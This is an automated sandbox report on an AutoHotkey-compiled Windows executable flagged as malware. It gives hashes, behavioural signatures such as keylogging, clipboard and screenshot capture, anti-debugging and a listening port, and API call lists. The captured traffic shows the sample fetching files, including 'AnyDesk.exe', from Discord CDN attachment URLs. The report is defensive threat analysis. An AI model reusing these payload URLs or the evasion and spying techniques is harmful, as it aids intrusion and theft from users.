Edit tour

Windows Analysis Report
SecuriteInfo.com.FileRepMalware.14270.3068.exe

Overview

General Information

Sample name:	SecuriteInfo.com.FileRepMalware.14270.3068.exe
Analysis ID:	1417368
MD5:	dfbaf344699830430ae052254168d580
SHA1:	de616823f575b133c413bd497d30f8b19e71dce6
SHA256:	51b0a985ab920e9f898b89bb10d3c5f6382179b046f3882a5697c1e2d8c88ba6
Tags:	exe
Infos:

Detection

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Contains functionality to detect sleep reduction / modifications

Sample or dropped binary is a compiled AutoHotkey binary

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

OS version to string mapping found (often used in BOTs)

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

System is w10x64

SecuriteInfo.com.FileRepMalware.14270.3068.exe (PID: 5924 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe" MD5: DFBAF344699830430AE052254168D580)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe	ReversingLabs: Detection: 13%
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe	Virustotal: Detection: 45%			Perma Link

Source: unknown

HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.6:49699 version: TLS 1.2

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400AE260 FindFirstFileW,FindClose,FindFirstFileW,FindClose,	0_2_00000001400AE260
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400AE160 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00000001400AE160
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014003C8E0 FindFirstFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,	0_2_000000014003C8E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140066F50 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,GetLastError,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,	0_2_0000000140066F50
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400672B0 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,free,malloc,	0_2_00000001400672B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140081660 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,wcsncpy,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,MoveFileW,DeleteFileW,MoveFileW,GetLastError,CopyFileW,GetLastError,	0_2_0000000140081660
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140067900 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,	0_2_0000000140067900
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140081C50 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0000000140081C50

Source: Joe Sandbox View	IP Address: 162.159.133.233 162.159.133.233
Source: Joe Sandbox View	IP Address: 162.159.133.233 162.159.133.233

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Code function: 0_2_000000014007E490 _wcstoi64,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetReadFile,GetTickCount,PeekMessageW,GetTickCount,InternetReadFile,InternetReadFileExA,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,InternetCloseHandle,fclose,DeleteFileW,

0_2_000000014007E490

Source: global traffic	HTTP traffic detected: GET /attachments/946434985617944649/1187447469743804447/1img.png?ex=6596eba2&is=658476a2&hm=0a3291a0428a9a3a412cccb212e697c45efde312d3ae0a17818b7bba37eb978d& HTTP/1.1User-Agent: AutoHotkeyHost: cdn.discordapp.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /attachments/946434985617944649/1187447469492150292/3img.png?ex=6596eba2&is=658476a2&hm=e54785c353dcbe635c35016ed6a0babbb34588ac67d1176df058c308ee2bef44& HTTP/1.1User-Agent: AutoHotkeyHost: cdn.discordapp.comCache-Control: no-cacheCookie: __cf_bm=WAgSjmN_wP2eFedjicHfRrdUiKndDMaS86a4K75qnaQ-1711686061-1.0.1.1-w9CFE_AePNDy_Wk3xZI6zK2dF1cZjaN2undiK6NtC2SylUPBRZx1h1rEe28blv8UENKQFkTayXcFWGs54KEpLA; _cfuvid=NokBoZytmEIMqSMZLzeheyttRjABninEj.riDLOMx_M-1711686061063-0.0.1.1-604800000
Source: global traffic	HTTP traffic detected: GET /attachments/946434985617944649/1187447469185974412/2img.png?ex=6596eba2&is=658476a2&hm=ceac553c8fa20a5a29d3a30fafcd5022ef44d33396c849d1a84b29a8507c87e5& HTTP/1.1User-Agent: AutoHotkeyHost: cdn.discordapp.comCache-Control: no-cacheCookie: __cf_bm=WAgSjmN_wP2eFedjicHfRrdUiKndDMaS86a4K75qnaQ-1711686061-1.0.1.1-w9CFE_AePNDy_Wk3xZI6zK2dF1cZjaN2undiK6NtC2SylUPBRZx1h1rEe28blv8UENKQFkTayXcFWGs54KEpLA; _cfuvid=NokBoZytmEIMqSMZLzeheyttRjABninEj.riDLOMx_M-1711686061063-0.0.1.1-604800000
Source: global traffic	HTTP traffic detected: GET /attachments/946434985617944649/1187449788539613234/AnyDesk.exe?ex=6596edcb&is=658478cb&hm=1ccb90ac0e74e5fc5ff101f4716703308a02fb42540256a74e81a4d808fbe4ef& HTTP/1.1User-Agent: AutoHotkeyHost: cdn.discordapp.comCache-Control: no-cacheCookie: __cf_bm=WAgSjmN_wP2eFedjicHfRrdUiKndDMaS86a4K75qnaQ-1711686061-1.0.1.1-w9CFE_AePNDy_Wk3xZI6zK2dF1cZjaN2undiK6NtC2SylUPBRZx1h1rEe28blv8UENKQFkTayXcFWGs54KEpLA; _cfuvid=NokBoZytmEIMqSMZLzeheyttRjABninEj.riDLOMx_M-1711686061063-0.0.1.1-604800000

Source: unknown

DNS traffic detected: queries for: cdn.discordapp.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Mar 2024 04:21:01 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=WAgSjmN_wP2eFedjicHfRrdUiKndDMaS86a4K75qnaQ-1711686061-1.0.1.1-w9CFE_AePNDy_Wk3xZI6zK2dF1cZjaN2undiK6NtC2SylUPBRZx1h1rEe28blv8UENKQFkTayXcFWGs54KEpLA; path=/; expires=Fri, 29-Mar-24 04:51:01 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8V6xnPq1xbTgxH6gOWx21TemBvlKNtiv4oscg8DiiDreyU66khMHs4Y04SDY0%2Fupk7IHVOnOqHwUHTqOrzN45cRFfo3n9JskjwMUGXcz5%2FktyKp%2BKhQlCKtHeTGcuLzsaL3tlQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=NokBoZytmEIMqSMZLzeheyttRjABninEj.riDLOMx_M-1711686061063-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 86bd12198ddc05ce-IADalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Mar 2024 04:21:01 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EbHSRBjCGkqqNTK04oK6XceWlvmYyEiRupfFt2LLROR3P43X0Ng54r0g2dclIl1HE88oLzk4M0P8t3AwSofZllPcyza%2F6MyRYbVWEh0aP0Vw3%2Bc2LpY2qDoO3F5OHhxDHD7biA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86bd121d38785a40-IADalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Mar 2024 04:21:02 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jjSik6EHcLiOpxxP1xAL6k%2BoMUGw42udkdzosPaF0VZ%2BoORFcx16y%2BGQX1GRx3Mh4cXbZf85fCscxFE4RUVXQs68LbsaTji7m4%2BEp4Nuuiu69k%2F5y4Ozg5cxfzbaFkoIylpYPA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86bd12203afa5a45-IADalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Mar 2024 04:21:02 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LjW5pURb%2BDcAIYFDC%2B%2B%2FKrte0TLhDJBEVjIZiQkp1uzrOEETOhAlg2bXCSWmxOxdAJeOABUb7IbycRwGXfD6OsxsjnQSEP4FEpLL0Ss9iQlfC5aJCmTvIGhKHH%2F38PLNLM2bdw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86bd122319af20ba-IADalt-svc: h3=":443"; ma=86400

Source: Amcache.hve.0.dr	String found in binary or memory: http://upx.sf.net
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe	String found in binary or memory: https://autohotkey.com
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe	String found in binary or memory: https://autohotkey.comCould
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe, 00000000.00000003.2082580723.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.14270.3068.exe, 00000000.00000002.3328171326.0000000000951000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe	String found in binary or memory: https://cdn.discordapp.com/attachments/946434985617944649/1187447469185974412/2img.png?ex=6596eba2&i
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe	String found in binary or memory: https://cdn.discordapp.com/attachments/946434985617944649/1187447469492150292/3img.png?ex=6596eba2&i
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe	String found in binary or memory: https://cdn.discordapp.com/attachments/946434985617944649/1187447469743804447/1img.png?ex=6596eba2&i
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe	String found in binary or memory: https://cdn.discordapp.com/attachments/946434985617944649/1187449788539613234/AnyDesk.exe?ex=6596edc

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown

HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.6:49699 version: TLS 1.2

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Code function: 0_2_00000001400065E0 GetTickCount,OpenClipboard,GetTickCount,OpenClipboard,

0_2_00000001400065E0

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140006240 EmptyClipboard,GlobalUnlock,CloseClipboard,GlobalUnlock,GlobalFree,GlobalUnlock,CloseClipboard,SetClipboardData,GlobalUnlock,CloseClipboard,GlobalUnlock,CloseClipboard,GlobalUnlock,GlobalFree,		0_2_0000000140006240
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400B12C0 EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,GlobalFree,GlobalUnlock,CloseClipboard,GlobalUnlock,CloseClipboard,		0_2_00000001400B12C0

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Code function: 0_2_00000001400064C0 GetClipboardFormatNameW,GetClipboardData,

0_2_00000001400064C0

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Code function: 0_2_0000000140054F10 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetSystemMetrics,GetSystemMetrics,wcsncpy,GetDC,DestroyIcon,DeleteObject,GetIconInfo,CreateCompatibleDC,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,CreateCompatibleDC,free,malloc,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,free,free,free,free,malloc,

0_2_0000000140054F10

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Code function: 0_2_00000001400167C0 GetTickCount,PeekMessageW,GetTickCount,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetTickCount,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetTickCount,

0_2_00000001400167C0

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Code function: 0_2_0000000140001ABC GlobalUnlock,CloseClipboard,SetTimer,GetTickCount,GetTickCount,GetMessageW,GetTickCount,GetFocus,TranslateAcceleratorW,GetKeyState,GetWindowLongW,IsWindowEnabled,GetKeyState,GetKeyState,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,PostMessageW,SendMessageW,SendMessageW,IsDialogMessageW,ShowWindow,GetForegroundWindow,GetWindowThreadProcessId,GetClassNameW,IsDialogMessageW,SetCurrentDirectoryW,KillTimer,

0_2_0000000140001ABC

System Summary

Sample or dropped binary is a compiled AutoHotkey binary

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Window found: window name: AutoHotkey

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Code function: 0_2_000000014005F630: CreateFileW,DeviceIoControl,CloseHandle,

0_2_000000014005F630

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Code function: 0_2_0000000140081CD0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,

0_2_0000000140081CD0

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140056130	0_2_0000000140056130
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014007E490	0_2_000000014007E490
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400B2650	0_2_00000001400B2650
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014008A6B0	0_2_000000014008A6B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400D2AC4	0_2_00000001400D2AC4
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014001EF90	0_2_000000014001EF90
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400D7010	0_2_00000001400D7010
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140001ABC	0_2_0000000140001ABC
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140041B60	0_2_0000000140041B60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140049FF0	0_2_0000000140049FF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014004C050	0_2_000000014004C050
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400BE0A0	0_2_00000001400BE0A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014003A095	0_2_000000014003A095
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400620E0	0_2_00000001400620E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014005C0E0	0_2_000000014005C0E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400BC190	0_2_00000001400BC190
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400201B3	0_2_00000001400201B3
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014008E1C0	0_2_000000014008E1C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400501D8	0_2_00000001400501D8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014009E220	0_2_000000014009E220
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014004622B	0_2_000000014004622B
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400A02D0	0_2_00000001400A02D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400D63B0	0_2_00000001400D63B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014004E3AB	0_2_000000014004E3AB
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014004A3C0	0_2_000000014004A3C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014004C3F0	0_2_000000014004C3F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014005A420	0_2_000000014005A420
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014000A420	0_2_000000014000A420
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400904AD	0_2_00000001400904AD
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400904BC	0_2_00000001400904BC
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400904D8	0_2_00000001400904D8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400904FA	0_2_00000001400904FA
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400DE500	0_2_00000001400DE500
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014009051B	0_2_000000014009051B
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140090527	0_2_0000000140090527
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014009054D	0_2_000000014009054D
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014004654B	0_2_000000014004654B
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014009058E	0_2_000000014009058E
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140088581	0_2_0000000140088581
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014009A5C8	0_2_000000014009A5C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140092638	0_2_0000000140092638
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400286B0	0_2_00000001400286B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014002A760	0_2_000000014002A760
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014000278B	0_2_000000014000278B
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400B07C0	0_2_00000001400B07C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400807F0	0_2_00000001400807F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014005C840	0_2_000000014005C840
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014000A840	0_2_000000014000A840
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014007E860	0_2_000000014007E860
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140098880	0_2_0000000140098880
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014004C890	0_2_000000014004C890
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400588A0	0_2_00000001400588A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014009A8A5	0_2_000000014009A8A5
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140070900	0_2_0000000140070900
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140020920	0_2_0000000140020920
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014005092D	0_2_000000014005092D
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014005E950	0_2_000000014005E950
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140086990	0_2_0000000140086990
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400409A0	0_2_00000001400409A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400AC9B0	0_2_00000001400AC9B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014007A9C0	0_2_000000014007A9C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140008A60	0_2_0000000140008A60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140072AE0	0_2_0000000140072AE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400B8B10	0_2_00000001400B8B10
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400AEB60	0_2_00000001400AEB60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140052B90	0_2_0000000140052B90
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140050B92	0_2_0000000140050B92
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140048BA0	0_2_0000000140048BA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014008CC20	0_2_000000014008CC20
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014006EC20	0_2_000000014006EC20
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014007CC1F	0_2_000000014007CC1F
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400C8C50	0_2_00000001400C8C50
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140032C68	0_2_0000000140032C68
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140046CA0	0_2_0000000140046CA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140060CB9	0_2_0000000140060CB9
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140074D00	0_2_0000000140074D00
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140094D30	0_2_0000000140094D30
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400D6D3C	0_2_00000001400D6D3C
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140076D40	0_2_0000000140076D40
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140058D60	0_2_0000000140058D60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140006D70	0_2_0000000140006D70
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400CEE20	0_2_00000001400CEE20
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140080E20	0_2_0000000140080E20
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140044E60	0_2_0000000140044E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014004AE70	0_2_000000014004AE70
